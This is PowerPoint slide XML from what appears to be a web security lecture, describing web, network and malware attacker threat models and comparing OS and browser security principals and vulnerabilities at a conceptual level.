            <a:ext cx="73501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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>reply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281728A-C6D7-7246-88EE-C2118FCC5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Does the Attacker Live?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Oval 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{898AE998-0FD6-894E-9E74-A4EAE9F9AE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87493" y="4109353"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Oval 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FD3EBFC-F45B-8B4D-B703-20E21ACAA7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82982" y="1761268"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Oval 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C92FB850-1D99-C14A-85DA-4E7B1442CE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02146" y="2727776"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text Box 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3705EA20-EC91-F343-8D46-DAEA3427D6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74328" y="4266119"/>
            <a:ext cx="117565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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Explosion 1 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEB4F082-48B1-BA44-A8E0-40377CC6BE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98989" y="2355477"/>
            <a:ext cx="1976437" cy="1838325"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln w="28575" algn="ctr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Font typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Web attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Explosion 1 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE9E49AC-68E6-4246-B301-713C44678D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88715" y="2499628"/>
            <a:ext cx="2362200" cy="1838325"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln w="28575" algn="ctr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Font typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Network attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Explosion 1 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70AA91C5-7AB2-DA45-AF63-9A827727AF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6441" y="3291221"/>
            <a:ext cx="2362200" cy="1838325"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln w="28575" algn="ctr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Font typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Malware attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3018900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9" grpId="1" animBg="1"/>
      <p:bldP spid="21" grpId="0" animBg="1"/>
      <p:bldP spid="21" grpId="1" animBg="1"/>
      <p:bldP spid="2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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBB5B1DD-5FCF-FE49-8A5D-9A03DB1E43A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Web Threat Models</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167939" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#13;&#10;Second level&#13;&#10;Third level&#13;&#10;Fourth level&#13;&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A997619F-05B3-3B41-AB26-07079C52148D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066800" y="2103120"/>
            <a:ext cx="8991598" cy="3849624"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Web attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Network attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Passive: wireless eavesdropper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Active: evil Wi-Fi router, DNS poisoning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Malware attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Malicious code executes directly on victim’s computer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF3399"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>To infect victim’s computer, can exploit software bugs (e.g., buffer overflow) or convince user to install malicious content </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>(how?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Masquerade as an antivirus program, video codec, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26628" name="Line 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84442B9B-1819-C648-B688-A282CE4BA536}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="849085" y="2201094"/>
            <a:ext cx="0" cy="3200400"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="CC3300"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd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D91B40E-6842-1C48-9AAB-CD559D6D194C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3451135" y="2044751"/>
            <a:ext cx="1057320" cy="558720"/>
            <a:chOff x="3451135" y="2044751"/>
            <a:chExt cx="1057320" cy="558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62D88841-E604-7842-BBF1-8EB071C2DAAD}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3534655" y="2256071"/>
                <a:ext cx="973800" cy="604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62D88841-E604-7842-BBF1-8EB071C2DAAD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472015" y="2193071"/>
                  <a:ext cx="109944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8364F823-A0B8-1547-9749-946CC2339168}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3509095" y="2044751"/>
                <a:ext cx="244080" cy="2214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8364F823-A0B8-1547-9749-946CC2339168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446455" y="1982111"/>
                  <a:ext cx="369720" cy="34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0103FB03-0015-B141-BCC2-C7A4AA3C6334}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3451135" y="2305391"/>
                <a:ext cx="286560" cy="2980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0103FB03-0015-B141-BCC2-C7A4AA3C6334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388495" y="2242391"/>
                  <a:ext cx="412200" cy="4237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CF5337E-64C8-DF45-8101-9894F2AAB342}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4742606" y="1839497"/>
            <a:ext cx="646611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  <a:latin typeface="Segoe Print" panose="02000800000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>The goal of Web security is to protect against these attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="208469992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9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80000"/>
                <a:shade val="100000"/>
                <a:satMod val="300000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="bg1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6" name="Rectangle 135">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED15573D-0E45-4691-B525-471152EC1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9E448559-19A4-4252-8C27-54C1DA906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4419599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1B19C35E-4E30-4F1D-9FC2-F2FA6191E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819" y="466344"/>
            <a:ext cx="3959352" cy="592531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27649" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1E61822-BE03-E545-BD89-6B95F811172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76240" y="875324"/>
            <a:ext cx="3536510" cy="5093520"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Web Attacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="4400">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167939" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#13;&#10;Second level&#13;&#10;Third level&#13;&#10;Fourth level&#13;&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C666358-A14C-7D4F-81E8-32468291A8CB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5478124" y="559477"/>
            <a:ext cx="6479180" cy="5475563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Controls a malicious website (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>attacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Can even obtain an SSL/TLS certificate for his site ($0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>User visits </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>attacker.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Why? Phishing email, enticing content, search results, link placed by an ad network, FB app, blind luck …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Attacker has no other access to user machine!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Variation: “iframe attacker”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>An iframe with malicious content included in an otherwise honest webpage (syndicated advertising, mashups, etc.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20211098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9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Title 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB360280-05DE-A042-AD26-B2AA9AE369F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OS vs. Browser Analogies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28674" name="Content Placeholder 4" descr="Rectangle: Click to edit Master text styles&#13;&#10;Second level&#13;&#10;Third level&#13;&#10;Fourth level&#13;&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C80DC2FD-4D0C-EC4C-B283-CCA8C49C204B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="2429694"/>
            <a:ext cx="4663440" cy="3749040"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Primitives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>System calls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Disk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Principals: Users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Discretionary access control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Buffer overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Root exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28675" name="Content Placeholder 5" descr="Rectangle: Click to edit Master text styles&#13;&#10;Second level&#13;&#10;Third level&#13;&#10;Fourth level&#13;&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49811C3B-631F-7045-AD6E-208FDB9812E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6461760" y="2478679"/>
            <a:ext cx="4663440" cy="3749040"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Primitives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Document object model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Frames</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Cookies and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>localStorage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Principals: “Origins”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Mandatory access control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Cross-site scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Universal scripting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771C582-14DD-0043-BA9A-77FB5051CE88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="1778000"/>
            <a:ext cx="3209533" cy="5847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3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Operating system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3CED751-A6CE-E84F-B8E4-FDF37F57743D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
